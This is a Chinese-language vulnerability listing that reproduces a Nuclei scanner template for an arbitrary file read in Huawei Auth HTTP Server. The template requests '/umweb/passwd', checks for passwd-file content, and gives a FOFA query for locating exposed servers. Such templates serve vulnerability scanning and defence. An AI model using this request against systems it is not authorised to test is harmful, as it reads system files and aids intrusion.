huawei-authhttp-lfi: Huawei Auth Http Server - Arbitrary File Read

日期: 2025-08-01 | 影响软件: Huawei Auth Http Server | POC: 已公开

漏洞描述

Huawei Auth HTTP Server is vulnerable to Arbitrary File Read.

PoC代码[已公开]

id: huawei-authhttp-lfi

info:
  name: Huawei Auth Http Server - Arbitrary File Read
  author: DhiyaneshDk
  severity: high
  description: Huawei Auth HTTP Server is vulnerable to Arbitrary File Read.
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498499&idx=1&sn=6850c3e9a3df795e48ba9a10c9772ddd
    - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/huawei-auth-http-readfile.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: server="Huawei Auth-Http Server 1.0"
  tags: lfi,huawei,authhttp,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/umweb/passwd"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Huawei Auth-Http Server"

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e95f76f058661dec562c08ec30cf9f166dd1bb191e2faa883da73b8c1d2d241c0220226357ad9f1c1c7e389349386a483920dd277d3f8cf3b7ff841de05543b5c271:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml